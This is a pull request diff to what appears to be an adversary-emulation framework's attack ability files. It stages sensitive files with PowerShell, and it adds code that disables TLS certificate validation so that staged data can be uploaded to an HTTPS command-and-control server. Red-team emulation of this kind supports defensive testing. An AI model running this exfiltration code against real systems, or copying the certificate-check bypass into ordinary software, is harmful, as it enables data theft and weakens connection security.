### PR TITLE
Gm updates

### DIFF
--- a/data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml
+++ b/data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml
@@ -19,9 +19,6 @@
     windows:
       psh:
         command: |
-          Copy-Item #{host.file.sensitive} #{host.dir.staged}
-      cmd:
-        command: |
-          copy #{host.file.sensitive} #{host.dir.staged}
+          Copy-Item "#{host.file.sensitive}" #{host.dir.staged}
 
 

--- a/data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml
+++ b/data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml
@@ -26,6 +26,11 @@
           $url = "#{server}/file/upload";
 
           Add-Type -AssemblyName 'System.Net.Http';
+          
+          #Support for HTTPS
+          Add-type "using System.Net; using System.Security.Cryptography.X509Certificates;  public class NoSSLCheckPolicy : ICertificatePolicy { public NoSSLCheckPolicy() {} public bool CheckValidationResult( ServicePoint sPoint, X509Certificate cert, WebRequest wRequest, int certProb) { return true; } }";
+          [System.Net.ServicePointManager]::CertificatePolicy = new-object NoSSLCheckPolicy; 
+          [Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;         
 
           $client = New-Object System.Net.Http.HttpClient;
           $content = New-Object System.Net.Http.MultipartFormDataContent;


### PR DESCRIPTION
Updates:

1.  Remove cmd as an option for staging files for exfiltration.  Doesn't easily support quoting filenames that for example have spaces in them.  PowerShell provides better support for this case.  Or is there a way to specify in the YAML to  prefer PowerShell over cmd?

2.  Exfilling data didn't support HTTPS C2 servers.